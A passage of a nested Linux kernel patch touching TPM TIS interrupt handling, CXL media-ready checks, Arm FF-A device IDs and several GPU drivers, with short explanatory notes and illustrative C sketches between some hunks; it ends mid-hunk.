+ 		return IRQ_NONE;
+ 
+-	priv->irq_tested = true;
++	set_bit(TPM_TIS_IRQ_TESTED, &priv->flags);
+ 	if (interrupt & TPM_INTF_DATA_AVAIL_INT)
+ 		wake_up_interruptible(&priv->read_queue);
+ 	if (interrupt & TPM_INTF_LOCALITY_CHANGE_INT)
+@@ -819,7 +842,7 @@ static int tpm_tis_probe_irq_single(struct tpm_chip *chip, u32 intmask,
+ 	if (rc < 0)
+ 		goto restore_irqs;
+ 
+-	priv->irq_tested = false;
++	clear_bit(TPM_TIS_IRQ_TESTED, &priv->flags);
+ 
+ 	/* Generate an interrupt by having the core call through to
+ 	 * tpm_tis_send
+@@ -1031,8 +1054,40 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 	if (rc < 0)
+ 		goto out_err;
+ 
+-	intmask |= TPM_INTF_CMD_READY_INT | TPM_INTF_LOCALITY_CHANGE_INT |
+-		   TPM_INTF_DATA_AVAIL_INT | TPM_INTF_STS_VALID_INT;
++	/* Figure out the capabilities */
++	rc = tpm_tis_read32(priv, TPM_INTF_CAPS(priv->locality), &intfcaps);
++	if (rc < 0)
++		goto out_err;
++
++	dev_dbg(dev, "TPM interface capabilities (0x%x):\n",
++		intfcaps);
++	if (intfcaps & TPM_INTF_BURST_COUNT_STATIC)
++		dev_dbg(dev, "\tBurst Count Static\n");
++	if (intfcaps & TPM_INTF_CMD_READY_INT) {
++		intmask |= TPM_INTF_CMD_READY_INT;
++		dev_dbg(dev, "\tCommand Ready Int Support\n");
++	}
++	if (intfcaps & TPM_INTF_INT_EDGE_FALLING)
++		dev_dbg(dev, "\tInterrupt Edge Falling\n");
++	if (intfcaps & TPM_INTF_INT_EDGE_RISING)
++		dev_dbg(dev, "\tInterrupt Edge Rising\n");
++	if (intfcaps & TPM_INTF_INT_LEVEL_LOW)
++		dev_dbg(dev, "\tInterrupt Level Low\n");
++	if (intfcaps & TPM_INTF_INT_LEVEL_HIGH)
++		dev_dbg(dev, "\tInterrupt Level High\n");
++	if (intfcaps & TPM_INTF_LOCALITY_CHANGE_INT) {
++		intmask |= TPM_INTF_LOCALITY_CHANGE_INT;
++		dev_dbg(dev, "\tLocality Change Int Support\n");
++	}
++	if (intfcaps & TPM_INTF_STS_VALID_INT) {
++		intmask |= TPM_INTF_STS_VALID_INT;
++		dev_dbg(dev, "\tSts Valid Int Support\n");
++	}
++	if (intfcaps & TPM_INTF_DATA_AVAIL_INT) {
++		intmask |= TPM_INTF_DATA_AVAIL_INT;
++		dev_dbg(dev, "\tData Avail Int Support\n");
++	}
++
+ 	intmask &= ~TPM_GLOBAL_INT_ENABLE;
+ 
+ 	rc = tpm_tis_request_locality(chip, 0);
+@@ -1066,35 +1121,14 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 		goto out_err;
+ 	}
+ 
+-	/* Figure out the capabilities */
+-	rc = tpm_tis_read32(priv, TPM_INTF_CAPS(priv->locality), &intfcaps);
+-	if (rc < 0)
+-		goto out_err;
+-
+-	dev_dbg(dev, "TPM interface capabilities (0x%x):\n",
+-		intfcaps);
+-	if (intfcaps & TPM_INTF_BURST_COUNT_STATIC)
+-		dev_dbg(dev, "\tBurst Count Static\n");
+-	if (intfcaps & TPM_INTF_CMD_READY_INT)
+-		dev_dbg(dev, "\tCommand Ready Int Support\n");
+-	if (intfcaps & TPM_INTF_INT_EDGE_FALLING)
+-		dev_dbg(dev, "\tInterrupt Edge Falling\n");
+-	if (intfcaps & TPM_INTF_INT_EDGE_RISING)
+-		dev_dbg(dev, "\tInterrupt Edge Rising\n");
+-	if (intfcaps & TPM_INTF_INT_LEVEL_LOW)
+-		dev_dbg(dev, "\tInterrupt Level Low\n");
+-	if (intfcaps & TPM_INTF_INT_LEVEL_HIGH)
+-		dev_dbg(dev, "\tInterrupt Level High\n");
+-	if (intfcaps & TPM_INTF_LOCALITY_CHANGE_INT)
+-		dev_dbg(dev, "\tLocality Change Int Support\n");
+-	if (intfcaps & TPM_INTF_STS_VALID_INT)
+-		dev_dbg(dev, "\tSts Valid Int Support\n");
+-	if (intfcaps & TPM_INTF_DATA_AVAIL_INT)
+-		dev_dbg(dev, "\tData Avail Int Support\n");
+-
+ 	/* INTERRUPT Setup */
+ 	init_waitqueue_head(&priv->read_queue);
+ 	init_waitqueue_head(&priv->int_queue);
++
++	rc = tpm_chip_bootstrap(chip);
++	if (rc)
++		goto out_err;
++
+ 	if (irq != -1) {
+ 		/*
+ 		 * Before doing irq testing issue a command to the TPM in polling mode
+@@ -1122,7 +1156,9 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 		else
+ 			tpm_tis_probe_irq(chip, intmask);
+ 
+-		if (!(chip->flags & TPM_CHIP_FLAG_IRQ)) {
++		if (chip->flags & TPM_CHIP_FLAG_IRQ) {
++			priv->int_mask = intmask;
++		} else {
+ 			dev_err(&chip->dev, FW_BUG
+ 					"TPM interrupt not working, polling instead\n");
+ 
+@@ -1159,31 +1195,20 @@ static void tpm_tis_reenable_interrupts(struct tpm_chip *chip)
+ 	u32 intmask;
+ 	int rc;
+ 
+-	if (chip->ops->clk_enable != NULL)
+-		chip->ops->clk_enable(chip, true);
+-
+-	/* reenable interrupts that device may have lost or
+-	 * BIOS/firmware may have disabled
++	/*
++	 * Re-enable interrupts that device may have lost or BIOS/firmware may
++	 * have disabled.
+ 	 */
+ 	rc = tpm_tis_write8(priv, TPM_INT_VECTOR(priv->locality), priv->irq);
+-	if (rc < 0)
+-		goto out;
++	if (rc < 0) {
++		dev_err(&chip->dev, "Setting IRQ failed.\n");
++		return;
++	}
+ 
+-	rc = tpm_tis_read32(priv, TPM_INT_ENABLE(priv->locality), &intmask);
++	intmask = priv->int_mask | TPM_GLOBAL_INT_ENABLE;
++	rc = tpm_tis_write32(priv, TPM_INT_ENABLE(priv->locality), intmask);
+ 	if (rc < 0)
+-		goto out;
+-
+-	intmask |= TPM_INTF_CMD_READY_INT
+-	    | TPM_INTF_LOCALITY_CHANGE_INT | TPM_INTF_DATA_AVAIL_INT
+-	    | TPM_INTF_STS_VALID_INT | TPM_GLOBAL_INT_ENABLE;
+-
+-	tpm_tis_write32(priv, TPM_INT_ENABLE(priv->locality), intmask);
+-
+-out:
+-	if (chip->ops->clk_enable != NULL)
+-		chip->ops->clk_enable(chip, false);
+-
+-	return;
++		dev_err(&chip->dev, "Enabling interrupts failed.\n");
+ }
+ 
+ int tpm_tis_resume(struct device *dev)
+@@ -1191,27 +1216,27 @@ int tpm_tis_resume(struct device *dev)
+ 	struct tpm_chip *chip = dev_get_drvdata(dev);
+ 	int ret;
+ 
+-	ret = tpm_tis_request_locality(chip, 0);
+-	if (ret < 0)
++	ret = tpm_chip_start(chip);
++	if (ret)
+ 		return ret;
+ 
+ 	if (chip->flags & TPM_CHIP_FLAG_IRQ)
+ 		tpm_tis_reenable_interrupts(chip);
+ 
+-	ret = tpm_pm_resume(dev);
+-	if (ret)
+-		goto out;
+-
+ 	/*
+ 	 * TPM 1.2 requires self-test on resume. This function actually returns
+ 	 * an error code but for unknown reason it isn't handled.
+ 	 */
+ 	if (!(chip->flags & TPM_CHIP_FLAG_TPM2))
+ 		tpm1_do_selftest(chip);
+-out:
+-	tpm_tis_relinquish_locality(chip, 0);
+ 
+-	return ret;
++	tpm_chip_stop(chip);
++
++	ret = tpm_pm_resume(dev);
++	if (ret)
++		return ret;
++
++	return 0;
+ }
+ EXPORT_SYMBOL_GPL(tpm_tis_resume);
+ #endif
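
The rewritten wait_for_tpm_stat() splits the requested status mask in two: bits that the recorded interrupt mask can actually signal are slept on, and the remainder is polled until the shared deadline. A condensed sketch of that shape; sleep_for_status() and read_status() are hypothetical stand-ins, and the polling interval in the driver comes from priv->timeout_min/max:

static int hybrid_wait(u8 want, u8 irq_capable, unsigned long stop)
{
	u8 irq_bits = want & irq_capable;

	/* phase 1: sleep until the irq-signalled subset is met */
	if (irq_bits && !sleep_for_status(irq_bits, stop))
		return -ETIME;

	/* phase 2: poll any bits the interrupt mask cannot report */
	want &= ~irq_bits;
	while (want && (read_status() & want) != want) {
		if (time_after(jiffies, stop))
			return -ETIME;
		usleep_range(100, 200);		/* illustrative bounds */
	}
	return 0;
}
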
+diff --git a/drivers/char/tpm/tpm_tis_core.h b/drivers/char/tpm/tpm_tis_core.h
+index 1d51d5168fb6e..e978f457fd4d4 100644
+--- a/drivers/char/tpm/tpm_tis_core.h
++++ b/drivers/char/tpm/tpm_tis_core.h
+@@ -87,6 +87,7 @@ enum tpm_tis_flags {
+ 	TPM_TIS_ITPM_WORKAROUND		= BIT(0),
+ 	TPM_TIS_INVALID_STATUS		= BIT(1),
+ 	TPM_TIS_DEFAULT_CANCELLATION	= BIT(2),
++	TPM_TIS_IRQ_TESTED		= BIT(3),
+ };
+ 
+ struct tpm_tis_data {
+@@ -95,7 +96,7 @@ struct tpm_tis_data {
+ 	unsigned int locality_count;
+ 	int locality;
+ 	int irq;
+-	bool irq_tested;
++	unsigned int int_mask;
+ 	unsigned long flags;
+ 	void __iomem *ilb_base_addr;
+ 	u16 clkrun_enabled;
+diff --git a/drivers/cxl/core/pci.c b/drivers/cxl/core/pci.c
+index a8456d5441fc7..003a44132418a 100644
+--- a/drivers/cxl/core/pci.c
++++ b/drivers/cxl/core/pci.c
+@@ -103,23 +103,57 @@ int devm_cxl_port_enumerate_dports(struct cxl_port *port)
+ }
+ EXPORT_SYMBOL_NS_GPL(devm_cxl_port_enumerate_dports, CXL);
+ 
+-/*
+- * Wait up to @media_ready_timeout for the device to report memory
+- * active.
+- */
+-int cxl_await_media_ready(struct cxl_dev_state *cxlds)
++static int cxl_dvsec_mem_range_valid(struct cxl_dev_state *cxlds, int id)
++{
++	struct pci_dev *pdev = to_pci_dev(cxlds->dev);
++	int d = cxlds->cxl_dvsec;
++	bool valid = false;
++	int rc, i;
++	u32 temp;
++
++	if (id > CXL_DVSEC_RANGE_MAX)
++		return -EINVAL;
++
++	/* Check MEM INFO VALID bit first, give up after 1s */
++	i = 1;
++	do {
++		rc = pci_read_config_dword(pdev,
++					   d + CXL_DVSEC_RANGE_SIZE_LOW(id),
++					   &temp);
++		if (rc)
++			return rc;
++
++		valid = FIELD_GET(CXL_DVSEC_MEM_INFO_VALID, temp);
++		if (valid)
++			break;
++		msleep(1000);
++	} while (i--);
++
++	if (!valid) {
++		dev_err(&pdev->dev,
++			"Timeout awaiting memory range %d valid after 1s.\n",
++			id);
++		return -ETIMEDOUT;
++	}
++
++	return 0;
++}
++
++static int cxl_dvsec_mem_range_active(struct cxl_dev_state *cxlds, int id)
+ {
+ 	struct pci_dev *pdev = to_pci_dev(cxlds->dev);
+ 	int d = cxlds->cxl_dvsec;
+ 	bool active = false;
+-	u64 md_status;
+ 	int rc, i;
++	u32 temp;
+ 
+-	for (i = media_ready_timeout; i; i--) {
+-		u32 temp;
++	if (id > CXL_DVSEC_RANGE_MAX)
++		return -EINVAL;
+ 
++	/* Check MEM ACTIVE bit, up to 60s timeout by default */
++	for (i = media_ready_timeout; i; i--) {
+ 		rc = pci_read_config_dword(
+-			pdev, d + CXL_DVSEC_RANGE_SIZE_LOW(0), &temp);
++			pdev, d + CXL_DVSEC_RANGE_SIZE_LOW(id), &temp);
+ 		if (rc)
+ 			return rc;
+ 
+@@ -136,6 +170,39 @@ int cxl_await_media_ready(struct cxl_dev_state *cxlds)
+ 		return -ETIMEDOUT;
+ 	}
+ 
++	return 0;
++}
++
++/*
++ * Wait up to @media_ready_timeout for the device to report memory
++ * active.
++ */
++int cxl_await_media_ready(struct cxl_dev_state *cxlds)
++{
++	struct pci_dev *pdev = to_pci_dev(cxlds->dev);
++	int d = cxlds->cxl_dvsec;
++	int rc, i, hdm_count;
++	u64 md_status;
++	u16 cap;
++
++	rc = pci_read_config_word(pdev,
++				  d + CXL_DVSEC_CAP_OFFSET, &cap);
++	if (rc)
++		return rc;
++
++	hdm_count = FIELD_GET(CXL_DVSEC_HDM_COUNT_MASK, cap);
++	for (i = 0; i < hdm_count; i++) {
++		rc = cxl_dvsec_mem_range_valid(cxlds, i);
++		if (rc)
++			return rc;
++	}
++
++	for (i = 0; i < hdm_count; i++) {
++		rc = cxl_dvsec_mem_range_active(cxlds, i);
++		if (rc)
++			return rc;
++	}
++
+ 	md_status = readq(cxlds->regs.memdev + CXLMDEV_STATUS_OFFSET);
+ 	if (!CXLMDEV_READY(md_status))
+ 		return -EIO;
+diff --git a/drivers/cxl/cxlpci.h b/drivers/cxl/cxlpci.h
+index 79e5603dfc82d..d6fafa1f92a47 100644
+--- a/drivers/cxl/cxlpci.h
++++ b/drivers/cxl/cxlpci.h
+@@ -31,6 +31,8 @@
+ #define   CXL_DVSEC_RANGE_BASE_LOW(i)	(0x24 + (i * 0x10))
+ #define     CXL_DVSEC_MEM_BASE_LOW_MASK	GENMASK(31, 28)
+ 
++#define CXL_DVSEC_RANGE_MAX		2
++
+ /* CXL 2.0 8.1.4: Non-CXL Function Map DVSEC */
+ #define CXL_DVSEC_FUNCTION_MAP					2
+ 
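
cxl_await_media_ready() now walks every HDM range advertised in the DVSEC capability word, first waiting for each range's Mem_Info_Valid bit and then for Mem_Active. Both loops are instances of a bounded config-space poll; a generic sketch follows (wait_for_cfg_bit() is a hypothetical name, and the real code extracts fields with FIELD_GET rather than a raw bit test):

static int wait_for_cfg_bit(struct pci_dev *pdev, int off, u32 bit, int secs)
{
	u32 val;
	int rc;

	do {
		rc = pci_read_config_dword(pdev, off, &val);
		if (rc)
			return rc;
		if (val & bit)
			return 0;
		msleep(1000);		/* 1 s granularity, as above */
	} while (secs--);

	return -ETIMEDOUT;
}
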
+diff --git a/drivers/firmware/arm_ffa/bus.c b/drivers/firmware/arm_ffa/bus.c
+index 99d4394806126..b9ce784f087df 100644
+--- a/drivers/firmware/arm_ffa/bus.c
++++ b/drivers/firmware/arm_ffa/bus.c
+@@ -15,6 +15,8 @@
+ 
+ #include "common.h"
+ 
++static DEFINE_IDA(ffa_bus_id);
++
+ static int ffa_device_match(struct device *dev, struct device_driver *drv)
+ {
+ 	const struct ffa_device_id *id_table;
+@@ -53,7 +55,8 @@ static void ffa_device_remove(struct device *dev)
+ {
+ 	struct ffa_driver *ffa_drv = to_ffa_driver(dev->driver);
+ 
+-	ffa_drv->remove(to_ffa_dev(dev));
++	if (ffa_drv->remove)
++		ffa_drv->remove(to_ffa_dev(dev));
+ }
+ 
+ static int ffa_device_uevent(struct device *dev, struct kobj_uevent_env *env)
+@@ -130,6 +133,7 @@ static void ffa_release_device(struct device *dev)
+ {
+ 	struct ffa_device *ffa_dev = to_ffa_dev(dev);
+ 
++	ida_free(&ffa_bus_id, ffa_dev->id);
+ 	kfree(ffa_dev);
+ }
+ 
+@@ -170,18 +174,24 @@ bool ffa_device_is_valid(struct ffa_device *ffa_dev)
+ struct ffa_device *ffa_device_register(const uuid_t *uuid, int vm_id,
+ 				       const struct ffa_ops *ops)
+ {
+-	int ret;
++	int id, ret;
+ 	struct device *dev;
+ 	struct ffa_device *ffa_dev;
+ 
++	id = ida_alloc_min(&ffa_bus_id, 1, GFP_KERNEL);
++	if (id < 0)
++		return NULL;
++
+ 	ffa_dev = kzalloc(sizeof(*ffa_dev), GFP_KERNEL);
+-	if (!ffa_dev)
++	if (!ffa_dev) {
++		ida_free(&ffa_bus_id, id);
+ 		return NULL;
++	}
+ 
+ 	dev = &ffa_dev->dev;
+ 	dev->bus = &ffa_bus_type;
+ 	dev->release = ffa_release_device;
+-	dev_set_name(&ffa_dev->dev, "arm-ffa-%04x", vm_id);
++	dev_set_name(&ffa_dev->dev, "arm-ffa-%d", id);
+ 
+ 	ffa_dev->vm_id = vm_id;
+ 	ffa_dev->ops = ops;
+@@ -217,4 +227,5 @@ void arm_ffa_bus_exit(void)
+ {
+ 	ffa_devices_unregister();
+ 	bus_unregister(&ffa_bus_type);
++	ida_destroy(&ffa_bus_id);
+ }
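
Naming devices after vm_id alone collides when more than one FF-A device is registered for the same partition; the IDA now hands out bus-wide unique ids, freed from the device release callback and destroyed at bus exit. A minimal sketch of the same pattern (the example_* names and to_example_dev() cast are hypothetical):

static DEFINE_IDA(example_ida);

static int example_register(struct example_dev *edev)
{
	int id = ida_alloc_min(&example_ida, 1, GFP_KERNEL);	/* ids start at 1 */

	if (id < 0)
		return id;
	edev->id = id;
	dev_set_name(&edev->dev, "example-%d", id);
	return 0;
}

static void example_release(struct device *dev)	/* dev->release callback */
{
	struct example_dev *edev = to_example_dev(dev);

	ida_free(&example_ida, edev->id);	/* return the id on final put */
	kfree(edev);
}
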
+diff --git a/drivers/firmware/arm_ffa/driver.c b/drivers/firmware/arm_ffa/driver.c
+index d5e86ef40b896..737f36e7a9035 100644
+--- a/drivers/firmware/arm_ffa/driver.c
++++ b/drivers/firmware/arm_ffa/driver.c
+@@ -501,12 +501,17 @@ ffa_setup_and_transmit(u32 func_id, void *buffer, u32 max_fragsize,
+ 		ep_mem_access->receiver = args->attrs[idx].receiver;
+ 		ep_mem_access->attrs = args->attrs[idx].attrs;
+ 		ep_mem_access->composite_off = COMPOSITE_OFFSET(args->nattrs);
++		ep_mem_access->flag = 0;
++		ep_mem_access->reserved = 0;
+ 	}
++	mem_region->reserved_0 = 0;
++	mem_region->reserved_1 = 0;
+ 	mem_region->ep_count = args->nattrs;
+ 
+ 	composite = buffer + COMPOSITE_OFFSET(args->nattrs);
+ 	composite->total_pg_cnt = ffa_get_num_pages_sg(args->sg);
+ 	composite->addr_range_cnt = num_entries;
++	composite->reserved = 0;
+ 
+ 	length = COMPOSITE_CONSTITUENTS_OFFSET(args->nattrs, num_entries);
+ 	frag_len = COMPOSITE_CONSTITUENTS_OFFSET(args->nattrs, 0);
+@@ -541,6 +546,7 @@ ffa_setup_and_transmit(u32 func_id, void *buffer, u32 max_fragsize,
+ 
+ 		constituents->address = sg_phys(args->sg);
+ 		constituents->pg_cnt = args->sg->length / FFA_PAGE_SIZE;
++		constituents->reserved = 0;
+ 		constituents++;
+ 		frag_len += sizeof(struct ffa_mem_region_addr_range);
+ 	} while ((args->sg = sg_next(args->sg)));
+diff --git a/drivers/gpio/gpio-mockup.c b/drivers/gpio/gpio-mockup.c
+index 523dfd17dd922..72a369cf82075 100644
+--- a/drivers/gpio/gpio-mockup.c
++++ b/drivers/gpio/gpio-mockup.c
+@@ -368,7 +368,7 @@ static void gpio_mockup_debugfs_setup(struct device *dev,
+ 		priv->offset = i;
+ 		priv->desc = gpiochip_get_desc(gc, i);
+ 
+-		debugfs_create_file(name, 0200, chip->dbg_dir, priv,
++		debugfs_create_file(name, 0600, chip->dbg_dir, priv,
+ 				    &gpio_mockup_debugfs_ops);
+ 	}
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+index 7e8b7171068dc..bebd136ed5444 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+@@ -1328,12 +1328,9 @@ int amdgpu_mes_self_test(struct amdgpu_device *adev)
+ 	struct amdgpu_mes_ctx_data ctx_data = {0};
+ 	struct amdgpu_ring *added_rings[AMDGPU_MES_CTX_MAX_RINGS] = { NULL };
+ 	int gang_ids[3] = {0};
+-	int queue_types[][2] = { { AMDGPU_RING_TYPE_GFX,
+-				   AMDGPU_MES_CTX_MAX_GFX_RINGS},
+-				 { AMDGPU_RING_TYPE_COMPUTE,
+-				   AMDGPU_MES_CTX_MAX_COMPUTE_RINGS},
+-				 { AMDGPU_RING_TYPE_SDMA,
+-				   AMDGPU_MES_CTX_MAX_SDMA_RINGS } };
++	int queue_types[][2] = { { AMDGPU_RING_TYPE_GFX, 1 },
++				 { AMDGPU_RING_TYPE_COMPUTE, 1 },
++				 { AMDGPU_RING_TYPE_SDMA, 1} };
+ 	int i, r, pasid, k = 0;
+ 
+ 	pasid = amdgpu_pasid_alloc(16);
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+index 08766b6784361..321a5ffebe88b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+@@ -390,6 +390,7 @@ static int mes_v11_0_set_hw_resources(struct amdgpu_mes *mes)
+ 	mes_set_hw_res_pkt.disable_reset = 1;
+ 	mes_set_hw_res_pkt.disable_mes_log = 1;
+ 	mes_set_hw_res_pkt.use_different_vmid_compute = 1;
++	mes_set_hw_res_pkt.enable_reg_active_poll = 1;
+ 	mes_set_hw_res_pkt.oversubscription_timer = 50;
+ 
+ 	return mes_v11_0_submit_pkt_and_poll_completion(mes,
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index 6299130663a3d..5d53e54ebe90b 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -1634,14 +1634,18 @@ static bool dc_link_construct_legacy(struct dc_link *link,
+ 				link->irq_source_hpd = DC_IRQ_SOURCE_INVALID;
+ 
+ 			switch (link->dc->config.allow_edp_hotplug_detection) {
+-			case 1: // only the 1st eDP handles hotplug
++			case HPD_EN_FOR_ALL_EDP:
++				link->irq_source_hpd_rx =
++						dal_irq_get_rx_source(link->hpd_gpio);
++				break;
++			case HPD_EN_FOR_PRIMARY_EDP_ONLY:
+ 				if (link->link_index == 0)
+ 					link->irq_source_hpd_rx =
+ 						dal_irq_get_rx_source(link->hpd_gpio);
+ 				else
+ 					link->irq_source_hpd = DC_IRQ_SOURCE_INVALID;
+ 				break;
+-			case 2: // only the 2nd eDP handles hotplug
++			case HPD_EN_FOR_SECONDARY_EDP_ONLY:
+ 				if (link->link_index == 1)
+ 					link->irq_source_hpd_rx =
+ 						dal_irq_get_rx_source(link->hpd_gpio);
+@@ -1649,6 +1653,7 @@ static bool dc_link_construct_legacy(struct dc_link *link,
+ 					link->irq_source_hpd = DC_IRQ_SOURCE_INVALID;
+ 				break;
+ 			default:
++				link->irq_source_hpd = DC_IRQ_SOURCE_INVALID;
+ 				break;
+ 			}
+ 		}
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_types.h b/drivers/gpu/drm/amd/display/dc/dc_types.h
+index ad9041472ccae..6050a3469a57c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_types.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_types.h
+@@ -993,4 +993,10 @@ struct display_endpoint_id {
+ 	enum display_endpoint_type ep_type;
+ };
+ 
++enum dc_hpd_enable_select {
++	HPD_EN_FOR_ALL_EDP = 0,
++	HPD_EN_FOR_PRIMARY_EDP_ONLY,
++	HPD_EN_FOR_SECONDARY_EDP_ONLY,
++};
++
+ #endif /* DC_TYPES_H_ */
+diff --git a/drivers/gpu/drm/amd/include/mes_v11_api_def.h b/drivers/gpu/drm/amd/include/mes_v11_api_def.h
+index 7e85cdc5bd34e..dc694cb246d9f 100644
+--- a/drivers/gpu/drm/amd/include/mes_v11_api_def.h
++++ b/drivers/gpu/drm/amd/include/mes_v11_api_def.h
+@@ -222,7 +222,11 @@ union MESAPI_SET_HW_RESOURCES {
+ 				uint32_t apply_grbm_remote_register_dummy_read_wa : 1;
+ 				uint32_t second_gfx_pipe_enabled : 1;
+ 				uint32_t enable_level_process_quantum_check : 1;
+-				uint32_t reserved	: 25;
++				uint32_t legacy_sch_mode : 1;
++				uint32_t disable_add_queue_wptr_mc_addr : 1;
++				uint32_t enable_mes_event_int_logging : 1;
++				uint32_t enable_reg_active_poll : 1;
++				uint32_t reserved	: 21;
+ 			};
+ 			uint32_t	uint32_t_all;
+ 		};
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_pm.c b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+index 2f3e239e623dc..7d613118cb713 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_pm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+@@ -869,13 +869,11 @@ static ssize_t amdgpu_get_pp_od_clk_voltage(struct device *dev,
+ 	}
+ 	if (ret == -ENOENT) {
+ 		size = amdgpu_dpm_print_clock_levels(adev, OD_SCLK, buf);
+-		if (size > 0) {
+-			size += amdgpu_dpm_print_clock_levels(adev, OD_MCLK, buf + size);
+-			size += amdgpu_dpm_print_clock_levels(adev, OD_VDDC_CURVE, buf + size);
+-			size += amdgpu_dpm_print_clock_levels(adev, OD_VDDGFX_OFFSET, buf + size);
+-			size += amdgpu_dpm_print_clock_levels(adev, OD_RANGE, buf + size);
+-			size += amdgpu_dpm_print_clock_levels(adev, OD_CCLK, buf + size);
+-		}
++		size += amdgpu_dpm_print_clock_levels(adev, OD_MCLK, buf + size);
++		size += amdgpu_dpm_print_clock_levels(adev, OD_VDDC_CURVE, buf + size);
++		size += amdgpu_dpm_print_clock_levels(adev, OD_VDDGFX_OFFSET, buf + size);
++		size += amdgpu_dpm_print_clock_levels(adev, OD_RANGE, buf + size);
++		size += amdgpu_dpm_print_clock_levels(adev, OD_CCLK, buf + size);
+ 	}
+ 
+ 	if (size == 0)
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index 9dd92bbdcefdc..bd61518bb7b12 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -125,6 +125,7 @@ static struct cmn2asic_msg_mapping smu_v13_0_7_message_map[SMU_MSG_MAX_COUNT] =
+ 	MSG_MAP(ArmD3,				PPSMC_MSG_ArmD3,                       0),
+ 	MSG_MAP(AllowGpo,			PPSMC_MSG_SetGpoAllow,           0),
+ 	MSG_MAP(GetPptLimit,			PPSMC_MSG_GetPptLimit,                 0),
++	MSG_MAP(NotifyPowerSource,		PPSMC_MSG_NotifyPowerSource,           0),
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_7_clk_map[SMU_CLK_COUNT] = {
+diff --git a/drivers/gpu/drm/drm_managed.c b/drivers/gpu/drm/drm_managed.c
+index 4cf214de50c40..c21c3f6230335 100644
+--- a/drivers/gpu/drm/drm_managed.c
++++ b/drivers/gpu/drm/drm_managed.c
+@@ -264,28 +264,10 @@ void drmm_kfree(struct drm_device *dev, void *data)
+ }
+ EXPORT_SYMBOL(drmm_kfree);
+ 
+-static void drmm_mutex_release(struct drm_device *dev, void *res)
++void __drmm_mutex_release(struct drm_device *dev, void *res)
+ {
+ 	struct mutex *lock = res;
+ 
+ 	mutex_destroy(lock);
+ }
+-
+-/**
+- * drmm_mutex_init - &drm_device-managed mutex_init()
+- * @dev: DRM device
+- * @lock: lock to be initialized
+- *
+- * Returns:
+- * 0 on success, or a negative errno code otherwise.
+- *
+- * This is a &drm_device-managed version of mutex_init(). The initialized
+- * lock is automatically destroyed on the final drm_dev_put().
+- */
+-int drmm_mutex_init(struct drm_device *dev, struct mutex *lock)
+-{
+-	mutex_init(lock);
+-
+-	return drmm_add_action_or_reset(dev, drmm_mutex_release, lock);
+-}
+-EXPORT_SYMBOL(drmm_mutex_init);
++EXPORT_SYMBOL(__drmm_mutex_release);
+diff --git a/drivers/gpu/drm/mgag200/mgag200_mode.c b/drivers/gpu/drm/mgag200/mgag200_mode.c
+index bbab2549243ab..ae90b260312a5 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_mode.c
++++ b/drivers/gpu/drm/mgag200/mgag200_mode.c
+@@ -640,6 +640,11 @@ void mgag200_crtc_helper_atomic_enable(struct drm_crtc *crtc, struct drm_atomic_
+ 	if (funcs->pixpllc_atomic_update)
+ 		funcs->pixpllc_atomic_update(crtc, old_state);
+ 
++	if (crtc_state->gamma_lut)
++		mgag200_crtc_set_gamma(mdev, format, crtc_state->gamma_lut->data);
++	else
++		mgag200_crtc_set_gamma_linear(mdev, format);
++
+ 	mgag200_enable_display(mdev);
+ 
+ 	if (funcs->enable_vidrst)
+diff --git a/drivers/gpu/drm/radeon/radeon_irq_kms.c b/drivers/gpu/drm/radeon/radeon_irq_kms.c
+index da2173435eddb..6541c1f6fca61 100644
+--- a/drivers/gpu/drm/radeon/radeon_irq_kms.c
++++ b/drivers/gpu/drm/radeon/radeon_irq_kms.c
+@@ -100,6 +100,16 @@ static void radeon_hotplug_work_func(struct work_struct *work)
+ 
+ static void radeon_dp_work_func(struct work_struct *work)
+ {
++	struct radeon_device *rdev = container_of(work, struct radeon_device,
++						  dp_work);
++	struct drm_device *dev = rdev->ddev;
++	struct drm_mode_config *mode_config = &dev->mode_config;
++	struct drm_connector *connector;
++
++	mutex_lock(&mode_config->mutex);
++	list_for_each_entry(connector, &mode_config->connector_list, head)
++		radeon_connector_hotplug(connector);
++	mutex_unlock(&mode_config->mutex);
+ }
+ 
+ /**
+diff --git a/drivers/hwtracing/coresight/coresight-tmc-etr.c b/drivers/hwtracing/coresight/coresight-tmc-etr.c
+index 867ad8bb9b0c3..368f2e5a86278 100644
+--- a/drivers/hwtracing/coresight/coresight-tmc-etr.c
++++ b/drivers/hwtracing/coresight/coresight-tmc-etr.c
+@@ -942,7 +942,7 @@ tmc_etr_buf_insert_barrier_packet(struct etr_buf *etr_buf, u64 offset)
+ 
+ 	len = tmc_etr_buf_get_data(etr_buf, offset,
+ 				   CORESIGHT_BARRIER_PKT_SIZE, &bufp);
+-	if (WARN_ON(len < CORESIGHT_BARRIER_PKT_SIZE))
